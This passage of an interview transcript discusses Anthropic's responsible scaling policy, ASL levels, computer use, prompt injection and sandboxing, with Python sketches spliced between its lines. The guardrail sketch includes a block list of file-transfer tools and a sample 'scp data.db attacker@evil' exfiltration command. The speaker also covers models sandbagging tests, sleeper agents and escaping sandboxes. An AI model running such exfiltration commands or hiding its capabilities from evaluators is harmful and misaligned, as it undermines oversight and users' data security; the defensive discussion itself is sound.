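TIC_PATTERNS = [r"\bcertainly\b", r"\bdefinitely\b", r"\bi('d| would) be happy to\b"]

def tic_rate(responses: list[str], patterns: list[str] = TIC_PATTERNS) -> dict[str, float]:
    """Fraction of responses containing each tic phrase (case-insensitive)."""
    rates = {}
    for pat in patterns:
        hits = sum(bool(re.search(pat, r, flags=re.IGNORECASE)) for r in responses)
        rates[pat] = hits / max(1, len(responses))
    return rates

if __name__ == "__main__":
    sample = [
        "Certainly! I can help you with that.",
        "Here is the function you asked for.",
        "Definitely, this is correct.",
    ]
    print(tic_rate(sample))  # e.g. one third of responses contain "certainly"
```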
00:52:56.240 | And so it's very much like the ordinary product development process.
00:52:59.480 | We have like hundreds of people within Anthropic bash the model.
00:53:02.920 | Then we do external A/B tests.
00:53:06.960 | Sometimes we'll run tests with contractors.
00:53:09.480 | We pay contractors to interact with the model.
00:53:11.920 | Um, so you put all of these things together and it's still not perfect.
00:53:16.640 | You still see behaviors that you don't quite want to see, right.
00:53:19.080 | You know, you see, you still see the model, like refusing things that it
00:53:22.640 | just doesn't make sense to refuse.
00:53:24.120 | But I think trying to solve this challenge, right,
00:53:29.080 | trying to stop the model from doing
00:53:31.040 | genuinely bad things that everyone
00:53:34.400 | agrees it shouldn't do, right,
00:53:35.640 | everyone agrees that the
00:53:38.640 | model shouldn't talk about, I don't know, child abuse material,
00:53:42.440 | right,
00:53:42.680 | everyone agrees the model shouldn't do that,
00:53:44.360 | but at the same time making sure it doesn't refuse in these dumb and stupid
00:53:48.240 | ways: I think drawing that line as finely as possible,
00:53:53.760 | approaching it perfectly, is still a challenge, and we're
00:53:56.400 | getting better at it every day.
00:53:57.960 | But there's, there's a lot to be solved.
00:53:59.520 | And again, I would point to that as, as an indicator of a challenge ahead in terms
00:54:05.040 | of steering much more powerful models.
00:54:07.680 | Do you think Claude 4.0 is ever coming out?
00:54:10.920 | I don't want to commit to any naming scheme,
00:54:14.040 | because if I say here, we're going to have Claude 4 next year,
00:54:18.480 | and then, you know, we decide that we
00:54:20.920 | should start over because there's a new type of model,
00:54:22.800 | I don't want to commit to it.
00:54:25.520 | I would expect in the normal course of business that Claude 4
00:54:28.840 | would come after Claude 3.5.
00:54:30.480 | But, you know, you never know in this wacky field.
00:54:33.720 | Right.
00:54:34.080 | But, uh, sort of this idea of scaling is continuing.
00:54:38.200 | Scale, scaling is continuing.
00:54:39.760 | There, there will definitely be more powerful models coming from us
00:54:43.200 | than the models that exist today.
00:54:44.400 | That is, that is certain.
00:54:45.880 | Or if there, if there aren't, we've, we've deeply failed as a company.
00:54:48.560 | Okay.
00:54:49.320 | Can you explain the responsible scaling policy and the AI safety
00:54:53.240 | level standards, ASL levels?
00:54:55.000 | As much as I'm excited about the benefits of these models,
00:54:58.720 | and we'll talk about that
00:55:00.160 | when we talk about Machines of Loving Grace, I'm worried about the risks and
00:55:04.720 | I continue to be worried about the risks.
00:55:06.440 | No one should think that Machines of Loving Grace was me
00:55:10.280 | saying I'm no longer worried about the risks of these models.
00:55:14.000 | I think they're two sides of the same coin.
00:55:15.760 | The, the, uh, power of the models and their ability to solve all these
00:55:21.200 | problems in, you know, biology, neuroscience, economic development,
00:55:25.920 | government, governance, and peace, large parts of the economy, those,
00:55:30.080 | those come with risks as well, right?
00:55:31.680 | With great power comes great responsibility, right?
00:55:34.040 | That's the, the two are, the two are paired, uh, things that are powerful
00:55:37.840 | can do good things and they can do bad things.
00:55:39.800 | Um, I think of those risks as, as being in, you know, several
00:55:43.480 | different, different categories.
00:55:44.920 | Perhaps the two biggest risks that I think about, and that's not to say that
00:55:49.000 | there aren't risks today that are, that are important, but when I think of the
00:55:52.160 | really, the, the, you know, the things that would happen on the grandest scale,
00:55:55.680 | um, one is what I call catastrophic misuse.
00:55:59.080 | These are misuse of the models in domains like cyber,
00:56:04.720 | bio, radiological, nuclear, right.
00:56:07.160 | Things that could, you know, that could harm or even kill thousands, even
00:56:13.080 | millions of people, if they really, really go wrong, um, like these are
00:56:16.560 | the number one priority to prevent.
00:56:19.840 | And, and here I would just make a simple observation, which is that.
00:56:23.680 | My, the models, you know, if, if I look today at people who have done
00:56:28.760 | really bad things in the world, um, uh, I think actually humanity has been
00:56:33.520 | protected by the fact that the overlap between really smart, well-educated
00:56:38.320 | people and people who want to do really horrific things has generally been small.
00:56:42.880 | Like, you know, let's say, let's say I'm someone who, you know, uh, you know,
00:56:47.320 | I have a PhD in this field, I have a well-paying job.
00:56:50.160 | Um, there's so much to lose.
00:56:52.360 | There's so much to lose.
00:56:56.040 | Even assuming I'm completely evil,
00:56:59.560 | which most people are not, why would such a
00:57:03.880 | person risk their life,
00:57:08.400 | their legacy, their reputation to do something truly
00:57:11.440 | evil? If we had a lot more people like that, the world would be
00:57:13.080 | And so my, my, my worry is that by being a, a much more intelligent
00:57:18.040 | agent, AI could break that correlation.
00:57:20.800 | And so I, I, I, I do have serious worries about that.
00:57:24.160 | I believe we can prevent those worries.
00:57:25.880 | But, you know, as a counterpoint to Machines of Loving Grace,
00:57:29.800 | I want to say that there are still serious risks. And the
00:57:33.920 | second range of risks would be the autonomy risks, which is the idea that
00:57:37.840 | models might on their own, particularly as we give them more agency than they've
00:57:42.280 | had in the past, uh, particularly as we give them supervision over wider tasks
00:57:48.080 | like, you know, writing whole code bases or someday even, you know, effectively
00:57:53.880 | operating entire, entire companies.
00:57:56.080 | They're on a long enough leash.
00:57:57.960 | Are they, are they doing what we really want them to do?
00:58:00.480 | It's very difficult to even understand in detail what they're doing,
00:58:04.240 | let alone, let alone control it.
00:58:06.640 | And like I said, this, these early signs that it's, it's hard to perfectly
00:58:11.920 | draw the boundary between things the model should do and things the model
00:58:14.960 | shouldn't do that, that, you know, if you go to one side, you get things that
00:58:19.480 | are annoying and useless and you go to the other side, you get other behaviors.
00:58:22.520 | If you fix one thing, it creates other problems.
00:58:25.160 | We're getting better and better at solving this.
00:58:27.200 | I don't think this is an unsolvable problem.
00:58:29.440 | I think this is a, you know, this is a science like, like the safety of
00:58:32.680 | airplanes or the safety of cars or the safety of drugs, I, you know, I, I don't
00:58:36.680 | think there's any big thing we're missing.
00:58:38.640 | I just think we need to get better at controlling these models.
00:58:41.720 | And so these are the two risks I'm worried about, and our
00:58:44.680 | responsible scaling plan, and I recognize this is a very long-winded answer
00:58:49.200 | to your question, our responsible scaling plan is designed to
00:58:53.680 | address these two types of risks.
00:58:55.960 | And so every time we develop a new model, we basically test it for its
00:59:02.120 | ability to do both of these bad things.
00:59:05.760 | So if I were to back up a little bit, I think we have an
00:59:10.600 | interesting dilemma with AI systems, where they're not yet powerful enough
00:59:15.760 | to present these catastrophes.
00:59:17.960 | I don't know that they'll ever
00:59:20.360 | present these catastrophes.
00:59:21.400 | It's possible they won't. But the case for worry, the case for risk, is
00:59:26.080 | strong enough that we should act now, and they're
00:59:29.920 | getting better very, very fast.
00:59:31.600 | Right.
00:59:32.200 | I testified in the Senate that we might have serious
00:59:35.800 | bio risks within two to three years.
00:59:37.520 | That was about a year ago; things have proceeded apace.
00:59:41.640 | So we have this thing where it's surprisingly
00:59:46.400 | hard to address these risks, because they're not here today.
00:59:50.560 | They don't exist.
00:59:51.360 | They're like ghosts, but they're coming at us so fast because the
00:59:54.320 | models are improving so fast.
00:59:55.640 | So how do you deal with something that's not here today, doesn't exist,
01:00:00.440 | but is, is coming at us very fast.
01:00:03.400 | So the solution we came up with for that, in collaboration with
01:00:08.480 | people like the organization METR and Paul Christiano,
01:00:12.520 | is, okay, what you need for that are tests to tell
01:00:17.920 | you when the risk is getting close.
01:00:19.600 | You need an early warning system.
01:00:21.080 | And, and so every time we have a new model, we test it for its capability
01:00:26.800 | to do these CBRN tasks, as well as testing it for, you know, how capable
01:00:32.600 | it is of doing tasks autonomously on its own and, uh, in the latest
01:00:37.160 | version of our RSP, which we released in the last, in the last month
01:00:40.800 | or two, uh, the way we test autonomy risks is the model, the AI model's
01:00:46.320 | ability to do aspects of AI research itself, uh, which when the model,
01:00:51.760 | when the AI models can do AI research, they become kind of truly, truly
01:00:55.240 | autonomous, uh, and that, you know, that threshold is important
01:00:58.200 | for a bunch of other ways.
01:00:59.640 | And so what do we then do with these tasks?
01:01:02.800 | The RSP basically develops what we've called an if-then structure,
01:01:07.920 | which is, if the models pass a certain capability threshold, then we impose a certain
01:01:14.040 | set of safety and security requirements on them.
01:01:16.440 | So today's models are what's called ASL-2 models. ASL-1
01:01:22.160 | is for systems that manifestly don't pose any risk of autonomy or misuse.
01:01:28.360 | So for example, a chess-playing bot; Deep Blue would be ASL-1.
01:01:32.720 | It's just manifestly the case that you can't use Deep Blue
01:01:36.760 | for anything other than chess.
01:01:38.080 | It was just designed for chess.
01:01:39.480 | No, one's going to use it to like, you know, to conduct a masterful
01:01:43.320 | cyber attack or to, you know, run wild and take over the world.
01:01:46.880 | ASL two is today's AI systems where we've measured them.
01:01:51.520 | And we think these systems are simply not smart enough to
01:01:56.640 | autonomously self-replicate or conduct a bunch of tasks, and
01:02:01.840 | also not smart enough to provide
01:02:04.280 | meaningful information about CBRN risks and how to build CBRN weapons above and
01:02:11.440 | beyond what can be known from looking at Google.
01:02:14.320 | In fact, sometimes they do provide information, but not above
01:02:18.840 | and beyond a search engine, and not in a way that can be stitched together,
01:02:21.880 | not in a way that kind of end to end is dangerous enough.
01:02:26.200 | So ASL three is going to be the point at which, uh, the models are
01:02:32.120 | helpful enough to enhance the capabilities of non-state actors, right?
01:02:37.400 | State actors can already do a lot, a lot of, unfortunately, to a high
01:02:41.640 | level of proficiency, a lot of these very dangerous and destructive things.
01:02:45.480 | The difference is that non-state, non-state actors are not capable of it.
01:02:49.800 | And so when we get to ASL-3, we'll take special security precautions
01:02:55.160 | designed to be sufficient to prevent theft of the model by non-state
01:02:58.920 | actors and misuse of the model as it's deployed. We'll have to have
01:03:03.640 | enhanced filters targeted at these particular areas:
01:03:08.840 | cyber, bio, nuclear, and model autonomy, which is less a misuse risk and more a
01:03:14.040 | risk of the model doing bad things itself.
01:03:16.560 | ASL-4 is getting to the point where these models could enhance the
01:03:22.880 | capability of an already knowledgeable state actor and/or
01:03:28.240 | become the main source of such a risk. Like, if you wanted to
01:03:32.880 | engage in such a risk, the main way you would do it is through a model.
01:03:35.920 | And then I think ASL-4, on the autonomy side, is some
01:03:40.040 | amount of acceleration in AI research capabilities with an AI
01:03:44.600 | model, and then ASL-5 is where we would get to the models that are
01:03:47.840 | kind of truly capable,
01:03:50.800 | that could exceed humanity in their ability to do any of these tasks.
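A minimal sketch of the if-then shape just described: capability evals in, required safeguards out. The eval names, numeric thresholds, and measure lists here are invented placeholders for illustration, not the actual RSP triggers.

```python
# Minimal sketch of the if-then shape of a responsible scaling policy.
# The eval names, thresholds, and required measures are invented placeholders
# for illustration; they are not the actual RSP triggers.
from dataclasses import dataclass

@dataclass
class EvalResults:
    cbrn_uplift: float      # measured uplift over a search-engine baseline (0..1)
    autonomy_score: float   # measured ability to do AI-R&D-style tasks (0..1)

def required_safety_level(results: EvalResults) -> tuple[str, list[str]]:
    """Map capability eval results to a safety level and its required measures."""
    if results.cbrn_uplift >= 0.5 or results.autonomy_score >= 0.5:
        return "ASL-4", ["interpretability-based verification", "state-actor-grade security"]
    if results.cbrn_uplift >= 0.2 or results.autonomy_score >= 0.2:
        return "ASL-3", ["enhanced security against model theft", "targeted deployment filters"]
    return "ASL-2", ["standard security and deployment practices"]

# A buffer below each trigger helps catch the danger before it is crossed.
print(required_safety_level(EvalResults(cbrn_uplift=0.25, autonomy_score=0.1)))
# ('ASL-3', ['enhanced security against model theft', 'targeted deployment filters'])
```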
01:03:54.920 | And so the, the, the point of the, if then structure commitment is, is
01:04:00.880 | basically to say, look, I don't know.
01:04:04.160 | I've been, I've been working with these models for many years and I've been
01:04:06.880 | worried about risk for many years.
01:04:08.480 | It's actually kind of dangerous to cry wolf.
01:04:11.080 | It's actually kind of dangerous to say this, you know, this, this
01:04:14.520 | model is, this model is risky.
01:04:16.720 | And you know, people look at it and they say, this is manifestly not dangerous.
01:04:20.480 | Again, the delicacy is that the risk isn't here
01:04:25.600 | today, but it's coming at us fast.
01:04:27.560 | How do you deal with that?
01:04:28.840 | It's really vexing to a risk planner to deal with it.
01:04:31.760 | And so this, if then structure basically says, look, we don't want
01:04:35.520 | to antagonize a bunch of people.
01:04:37.360 | We don't want to harm our own
01:04:40.920 | ability to have a place in the conversation by imposing these
01:04:46.320 | very onerous burdens on models that are not dangerous today.
01:04:51.000 | So the, if then the trigger commitment is basically a way to deal with this.
01:04:54.960 | It says you clamp down hard when you can show that the model is dangerous.
01:04:58.680 | And of course, what has to come with that is, you know, enough of a buffer
01:05:01.920 | threshold that, that, you know, you can, you can, uh, you know, you're, you're,
01:05:06.200 | you're, you're not at high risk of kind of missing the danger.
01:05:08.800 | It's not a perfect framework.
01:05:10.040 | We've had to change it every, every, uh, you know, we came out with a new
01:05:14.040 | one just a few weeks ago and probably, probably going forward, we might
01:05:17.700 | release new ones multiple times a year because it's, it's hard to get these
01:05:21.320 | policies, right, like technically organizationally from a research
01:05:25.000 | perspective, but that is the proposal.
01:05:27.240 | If then commitments and triggers in order to minimize burdens and false
01:05:33.320 | alarms now, but really react appropriately when the dangers are here.
01:05:37.040 | What do you think the timeline for ASL three is where several
01:05:40.440 | of the triggers are fired?
01:05:42.080 | And what do you think the timeline is for ASL four?
01:05:44.560 | Yeah.
01:05:44.920 | So that is hotly debated within the company.
01:05:47.000 | Um, uh, we are working actively to prepare ASL three, uh, security, uh,
01:05:53.480 | security measures, as well as ASL three deployment measures.
01:05:56.840 | Um, I'm not going to go into detail, but we've made, we've
01:05:59.320 | made a lot of progress on both.
01:06:00.780 | And you know, we're, we're prepared to be, I think ready quite soon.
01:06:04.520 | Uh, I would, I would not be surprised.
01:06:07.780 | I would not be surprised at all.
01:06:09.220 | If we hit ASL three, uh, next year, there was some concern that
01:06:13.220 | we, we might even hit it, uh, this year.
01:06:15.600 | That's still, that's still possible.
01:06:16.820 | That could still happen.
01:06:17.620 | It's like very hard to say, but like, I would be very, very
01:06:21.020 | surprised if it was like 2030.
01:06:22.660 | Uh, I think it's much sooner than that.
01:06:24.700 | So there's a protocols for detecting it if then, and then there's
01:06:29.460 | protocols for how to respond to it.
01:06:31.700 | How difficult is the second, the latter?
01:06:34.740 | Yeah, I think for ASL three, it's primarily about security.
01:06:38.500 | Um, and, and about, you know, filters on the model relating to a very narrow
01:06:44.120 | set of areas when we deploy the model, because at ASL three, the model isn't
01:06:48.900 | autonomous yet, um, uh, and, and so you don't have to worry about, you know,
01:06:53.180 | kind of the model itself behaving in a bad way, even when it's deployed internally.
01:06:57.860 | So I think the ASL three measures are, are, I won't say straightforward.
01:07:02.760 | They're, they're, they're, they're rigorous, but they're easier to reason about.
01:07:05.940 | I think once we get to ASL four, um, we start to have worries about the
01:07:12.120 | models being smart enough that they might sandbag tests, they might
01:07:16.600 | not tell the truth about tests.
01:07:18.200 | We had some results come out about sleeper agents, and there
01:07:21.800 | was a more recent paper about, you know, can the models mislead
01:07:26.920 | evaluation attempts, sandbag their own abilities, right,
01:07:30.500 | present themselves as being
01:07:33.940 | less capable than they are.
01:07:35.180 | And so I think with ASL four, there's going to be an important component
01:07:39.660 | of using other things than just interacting with the models, for
01:07:43.260 | example, interpretability or hidden chains of thought, uh, where you have
01:07:47.460 | to look inside the model and verify via some other mechanism that, that is
01:07:52.460 | not, you know, is not as easily corrupted as what the model says, uh,
01:07:56.180 | that, that, you know, that, that, that the model indeed has some property.
01:08:00.180 | Uh, so we're still working on ASL four.
01:08:02.180 | One of the properties of the RSP is that we, we don't specify
01:08:07.540 | ASL four until we've hit ASL three.
01:08:10.100 | And I think that's proven to be a wise decision, because even with ASL-3,
01:08:14.220 | again, it's hard to know this stuff in detail, and we
01:08:18.980 | want to take as much time as we can possibly take to get these things right.
01:08:22.900 | So for ASL-3, the bad actor will be the humans.
01:08:27.380 | And so there's a little bit more...
01:08:29.540 | For ASL-4, it's both, I think it's both.
01:08:31.620 | And so deception and that's where mechanistic interpretability comes
01:08:36.020 | into play and, uh, hopefully the techniques used for that are not
01:08:40.340 | made accessible to the model.
01:08:41.740 | Yeah.
01:08:42.740 | I mean, of course you can hook up the mechanistic interpretability
01:08:45.740 | to the model itself.
01:08:46.860 | But then you've kind of lost it as a
01:08:50.060 | reliable indicator of the model state.
01:08:54.540 | There are a bunch of exotic ways you can think of that.
01:08:56.780 | It might also not be reliable.
01:08:58.260 | Like if the, you know, model gets smart enough that it can like, you
01:09:01.660 | know, jump computers and like read the code where you're like
01:09:04.500 | looking at its internal state.
01:09:06.180 | We've thought about some of those.
01:09:07.460 | I think they're exotic enough.
01:09:08.740 | There are ways to render them unlikely, but yeah, generally you want to, you
01:09:12.460 | want to preserve mechanistic interpretability as a kind of verification
01:09:16.500 | set or test set that's separate from the training process of the model.
01:09:19.260 | See, I think, uh, as these models become better and better conversation
01:09:22.700 | and become smarter, social engineering becomes a threat too, because they,
01:09:27.140 | oh yeah, that can start being very convincing to the
01:09:29.180 | engineers inside companies.
01:09:30.580 | Oh yeah.
01:09:31.220 | Yeah.
01:09:31.740 | It's actually like, you know, we've, we've seen lots of examples of
01:09:34.540 | demagoguery in our life from humans.
01:09:36.460 | And, and, you know, there's a concern that models could do that.
01:09:38.660 | Could do that as well.
01:09:39.740 | One of the ways that Claude has been getting more and more powerful is it's
01:09:43.700 | now able to do some agentic stuff, computer use. There's also
01:09:49.340 | analysis within the sandbox of claude.ai itself, but let's talk about computer use.
01:09:53.980 | That seems to me super exciting, that you can just give Claude a task and
01:09:59.620 | it takes a bunch of actions, figures it out, and it has access to your
01:10:04.380 | computer through screenshots.
01:10:05.860 | So can you explain how that works and where that's headed?
01:10:10.540 | Yeah, it's actually relatively simple.
01:10:12.340 | So Claude has had for a long time, since Claude 3 back in March,
01:10:16.940 | the ability to analyze images and respond to them with text. The only new
01:10:22.060 | thing we added is those images can be screenshots of a computer and in
01:10:27.020 | response, we train the model to give a location on the screen where you can
01:10:31.340 | click and, or buttons on the keyboard.
01:10:33.860 | You can press in order to take action.
01:10:36.020 | And it turns out that with actually not all that much additional training, the
01:10:41.180 | models can get quite good at that task.
01:10:43.060 | It's a good example of generalization.
01:10:44.900 | Um, you know, people sometimes say if you get to low earth orbit, you're
01:10:48.100 | like halfway to anywhere, right?
01:10:49.280 | Because of how much it takes to escape the gravity.
01:10:51.100 | Well, if you have a strong pre-trained model, I feel like you're halfway to
01:10:54.300 | anywhere in terms of the intelligence space. And
01:11:00.380 | so actually it didn't take all that much to
01:11:03.580 | get Claude to do this, and you can just set that in a loop: give the model a
01:11:08.620 | screenshot, tell it what to click on, give it the next screenshot, tell it
01:11:11.460 | what to click on, and that turns into a full, almost 3D
01:11:16.020 | video interaction of the model.
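A schematic of the screenshot-in, action-out loop described above. The helper functions are hypothetical stand-ins, not the actual computer-use API: model_step would call a vision-capable model, while take_screenshot, click, and press would call whatever desktop-automation layer you use. The hard step cap is the kind of boundary discussed a little later in the conversation.

```python
# Schematic of the screenshot-in, action-out loop described above. The helper
# functions are hypothetical stand-ins, not the actual computer-use API.
from dataclasses import dataclass

@dataclass
class Action:
    kind: str                 # "click", "key", or "done"
    x: int = 0                # screen coordinates for clicks
    y: int = 0
    key: str = ""             # key name for keyboard actions

def run_agent(task: str, model_step, take_screenshot, click, press, max_steps: int = 20):
    """Loop: screenshot -> model proposes one action -> execute -> repeat."""
    for _ in range(max_steps):          # hard step cap as a simple guardrail
        screenshot = take_screenshot()
        action: Action = model_step(task, screenshot)
        if action.kind == "done":
            return True
        if action.kind == "click":
            click(action.x, action.y)
        elif action.kind == "key":
            press(action.key)
    return False                        # gave up: keep the model on a short leash
```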
01:11:17.780 | And it's able to do all of these tasks, right?
01:11:20.300 | You know, we, we showed these demos where it's able to like
01:11:22.660 | fill out spreadsheets.
01:11:24.260 | It's able to kind of like interact with a website.
01:11:27.140 | It's able to, you know, um, you know, it's able to open all kinds of, you
01:11:31.940 | know, programs, different operating systems, windows, Linux, Mac.
01:11:35.620 | Uh, uh, so, uh, you know, I think all of that is very exciting.
01:11:39.980 | I will say while in theory, there's nothing you could do there that you
01:11:44.260 | couldn't have done through just giving the model, the API to drive the computer
01:11:47.820 | screen, uh, this really lowers the barrier and, you know, there's, there's,
01:11:52.220 | there's a lot of folks who, who, who either, you know, kind of, kind of
01:11:55.380 | aren't, aren't, you know, aren't in a position to, to interact with those
01:11:58.580 | APIs or it takes them a long time to do.
01:12:00.580 | It's just, the screen is just a universal interface.
01:12:03.060 | That's a lot easier to interact with.
01:12:04.540 | And so I expect over time, this is going to lower a bunch of barriers.
01:12:08.580 | Now, honestly, the current model has, there's, it leaves a lot still to be
01:12:12.820 | desired and we were, we were honest about that in the blog, right?
01:12:15.540 | It makes mistakes, it misclicks and we, we, you know, we were careful to
01:12:20.140 | warn people, Hey, this thing isn't, you can't just leave this thing to, you
01:12:23.500 | know, run on your computer for minutes and minutes, um, you got to give this
01:12:28.020 | thing boundaries and guardrails.
01:12:29.380 | And I think that's one of the reasons we released it first in an API form
01:12:33.180 | rather than just
01:12:36.620 | handing it to the consumer and giving it control of their
01:12:40.220 | computer.
01:12:40.780 | Um, but, but, you know, I definitely feel that it's important to get these
01:12:44.940 | capabilities out there as models get more powerful, we're going to have to
01:12:48.460 | grapple with, you know, how do we use these capabilities safely?
01:12:51.780 | How do we prevent them from being abused?
01:12:53.660 | And, you know, I think releasing the model
01:12:57.540 | while the capabilities are still
01:13:01.900 | limited is very helpful in terms of doing that.
01:13:06.220 | You know, I think since it's been released, a number of customers, I
01:13:09.820 | think Replit was maybe one of the
01:13:13.820 | quickest to deploy things, have
01:13:18.140 | made use of it in various ways.
01:13:20.380 | People have hooked up demos for Windows desktops, Macs,
01:13:26.300 | Linux machines.
01:13:28.260 | So yeah, it's been very exciting.
01:13:31.800 | I think, as with anything else, it comes
01:13:35.220 | with new, exciting abilities.
01:13:37.300 | And then with those new, exciting
01:13:40.180 | abilities, we have to think about how to make the
01:13:42.860 | model safe, reliable, do what humans want it to do.
01:13:46.740 | I mean, it's the same, it's the same story for everything, right?
01:13:48.900 | Same thing.
01:13:49.660 | It's that same tension.
01:13:50.580 | But, but the possibility of use cases here is just the, the range is incredible.
01:13:55.080 | So, uh, how much to make it work really well in the future?
01:13:58.660 | How much do you have to specially kind of, uh, go beyond what's
01:14:03.140 | the pre-trained models doing, do more post-training, RLHF, or
01:14:06.880 | supervised fine-tuning, or synthetic data just for the agent?
01:14:10.540 | Yeah, I think speaking at a high level, it's our intention to keep
01:14:13.780 | investing a lot in, you know, making, making the model better.
01:14:16.900 | Uh, like I think, I think, uh, you know, we look at, look at some of the,
01:14:21.020 | you know, some of the benchmarks where previous models were like, oh,
01:14:23.720 | it could do it 6% of the time.
01:14:25.100 | And now our model would do it 14 or 22% of the time.
01:14:28.380 | And yeah, we want to get up to, you know, the human level reliability
01:14:31.340 | of 80, 90%, just like anywhere else, right?
01:14:33.340 | We're on the same curve that we were on with SWE-bench, where I would
01:14:36.940 | guess a year from now the models can do this very, very reliably,
01:14:39.740 | but you've got to start somewhere.
01:14:40.700 | So you think it's possible to get to the human level, 90%, uh, basically
01:14:45.740 | doing the same thing you're doing now, or is it has to be special for computer use?
01:14:49.500 | I mean, uh, it depends what you mean by, by, you know, special and special in
01:14:54.900 | general, um, but, but I, you know, I, I generally think, you know, the same
01:14:59.660 | kinds of techniques that we've been using to train the current model.
01:15:02.460 | I, I expect that doubling down on those techniques in the same way that we
01:15:05.700 | have for code, for code, for models in general, for other kits, for, you
01:15:10.140 | know, for image input, um, uh, you know, for voice, uh, I expect those same
01:15:15.620 | techniques will scale here as they have everywhere else.
01:15:18.060 | But this is giving sort of the power of action to Claude.
01:15:22.460 | And so you could do a lot of really powerful things, but you
01:15:25.340 | could do a lot of damage also.
01:15:26.580 | Yeah.
01:15:26.860 | Yeah, no.
01:15:27.660 | And we've been very aware of that.
01:15:29.100 | Look, my, my view actually is computer use isn't a fundamentally new capability
01:15:34.860 | like the CBRN or autonomy capabilities are, um, it's more like it kind of
01:15:40.460 | opens the aperture for the model to use and apply its existing abilities.
01:15:44.500 | And so the way we think about it, going back to our RSP, is that nothing
01:15:50.260 | this model is doing inherently increases the risk from an
01:15:56.700 | RSP perspective, but as the models get more powerful, having this
01:16:01.860 | capability may make it scarier.
01:16:04.380 | Once it has the cognitive capability
01:16:09.740 | to do something at the ASL-3 and ASL-4 level,
01:16:13.980 | this may be the thing that kind of unbounds it from doing so.
01:16:17.700 | So going forward, certainly this modality of interaction is something
01:16:22.300 | that we have tested for and that we will continue to test for an RSP going forward.
01:16:26.220 | Um, I think it's probably better to have, to learn and explore this
01:16:29.620 | capability before the model is super, uh, you know, super capable.
01:16:32.780 | Yeah.
01:16:33.140 | There's a lot of interesting attacks like prompt injection, because now
01:16:36.380 | you've widened the aperture so you can prompt inject through stuff on screen.
01:16:40.460 | So if this becomes more and more useful, then there's more and more
01:16:44.460 | benefit to inject, inject stuff into the model.
01:16:47.620 | If it goes to a certain web page, it could be harmless stuff like
01:16:50.540 | advertisements, or it could be like harmful stuff, right?
01:16:53.500 | Yeah.
01:16:53.740 | I mean, we've thought a lot about things like spam, CAPTCHA, mass campaigns.
01:16:57.820 | There's, you know, one secret I'll tell you: if
01:17:02.220 | you've invented a new technology, not necessarily the biggest misuse, but
01:17:06.900 | the first misuse you'll see is scams, just petty scams.
01:17:12.660 | People scamming each other,
01:17:15.780 | it's this thing as old as time.
01:17:18.220 | And it's just, every time, you've got to deal with it.
01:17:21.860 | It's almost silly to say, but it's true.
01:17:24.380 | Sort of bots and spam in general is a thing as it gets more and more intelligent.
01:17:29.420 | Yeah.
01:17:29.740 | It's a harder, harder fight.
01:17:31.380 | There are a lot of, like, like I said, like there are a lot
01:17:33.260 | of petty criminals in the world.
01:17:34.580 | And, and, and, you know, it's like every new technology is like a
01:17:37.940 | new way for petty, petty criminals to do something, you know,
01:17:41.140 | something stupid and malicious.
01:17:42.620 | Uh, is there any ideas about sandboxing it?
01:17:47.260 | Like how difficult is the sandboxing task?
01:17:49.740 | Yeah.
01:17:50.340 | We sandbox during training.
01:17:51.740 | So for example, during training, we didn't expose the model to the internet.
01:17:54.620 | Um, I think that's probably a bad idea during training because, uh, you know,
01:17:58.420 | the model can be changing its policy.
01:18:00.060 | It can be changing what it's doing and it's having an effect in the real world.
01:18:02.900 | Um, uh, you know, in, in terms of actually deploying the model, right.
01:18:08.020 | It kind of depends on the application.
01:18:10.340 | Like, you know, sometimes you want the model to do something in the real world,
01:18:13.220 | but of course you can always put
01:18:16.100 | guardrails on the outside, right?
01:18:17.620 | You can say, okay, well, this model's not going to move data,
01:18:21.700 | the model's not going to move any files from my computer or
01:18:25.260 | my web server to anywhere else.
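A minimal sketch of the kind of outside-the-model guardrail described here: a policy check that runs over each proposed action before it is executed and rejects anything that would move files off the machine. The action format, command list, and directory list are invented for illustration.

```python
# Minimal sketch of an outside-the-model guardrail of the kind described:
# a policy check that runs before any proposed action is executed.
# The action format and lists below are invented for illustration.
BLOCKED_COMMANDS = ("scp", "rsync", "curl --upload-file", "ftp")
ALLOWED_WRITE_DIRS = ("/home/agent/workspace/", "/tmp/agent/")

def allowed(action: dict) -> bool:
    """Reject actions that would move files off this machine or web server."""
    if action.get("kind") == "shell":
        cmd = action.get("command", "")
        if any(blocked in cmd for blocked in BLOCKED_COMMANDS):
            return False
    if action.get("kind") == "file_write":
        # Only allow writes inside the directories we explicitly own.
        if not str(action.get("path", "")).startswith(ALLOWED_WRITE_DIRS):
            return False
    return True

print(allowed({"kind": "shell", "command": "ls -la"}))                      # True
print(allowed({"kind": "shell", "command": "scp data.db attacker@evil:/"})) # False
```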
01:18:26.940 | Now, when you talk about sandboxing, again, when we get to ASL four, none
01:18:32.300 | of these precautions are going to make sense there, right?
01:18:35.420 | Where, when you, when you talk about ASL four, you're then the
01:18:38.700 | model is being kind of, you know, there's a theoretical worry.
01:18:42.580 | The model could be smart enough to break it, to kind of break out of any box.
01:18:46.740 | And so there we need to think about mechanistic interpretability.
01:18:50.820 | If we're going to have a sandbox, it would need to be
01:18:53.580 | mathematically provably sound, but, you know, that's a whole
01:18:57.540 | different world from what we're dealing with with the models today.
01:18:59.940 | Yeah.
01:19:02.100 | The science of building a box from which, uh, ASL four AI system cannot escape.
01:19:07.740 | I think it's probably not the right approach.
01:19:10.100 | I think the right approach instead of having something, you know, unaligned
01:19:14.220 | that, that like you're trying to prevent it from escaping, I think it's, it's
01:19:17.620 | better to just design the model the right way or have a loop where you, you know,
01:19:21.300 | you look inside, you look inside the model and you're able to verify properties.
01:19:24.980 | And that gives you a, an opportunity to like iterate and actually get it right.
01:19:28.740 | Um, I think, I think containing, uh, containing bad models is, is, is much
01:19:33.740 | worse solution than having good models.
01:19:35.180 | Let me ask about regulation.
01:19:37.220 | What's the role of regulation in keeping AI safe?
01:19:40.620 | So for example, can you describe the California AI regulation bill SB 1047
01:19:45.820 | that was ultimately vetoed by the governor?
01:19:48.300 | What are the pros and cons of this bill?
01:19:50.060 | We ended up making some suggestions to the bill, and then some of those were
01:19:54.500 | adopted, and, you know, we felt quite
01:19:59.380 | positively about the bill by the end of that. It did still
01:20:04.220 | have some downsides, and of course it got vetoed.
01:20:09.260 | Um, I think at a high level, I think some of the key ideas behind the
01:20:13.420 | bill, um, are, you know, I would say similar to ideas behind our RSPs.
01:20:17.740 | And I think it's very important that some jurisdiction, whether it's
01:20:21.420 | California or the federal government and, or other, other countries and other
01:20:25.740 | states passes some regulation like this.
01:20:28.780 | And I can talk through why I think that's so important.
01:20:31.660 | So I feel good about our RSP.
01:20:33.660 | It's not perfect.
01:20:34.700 | It needs to be iterated on a lot, but it's been a good forcing
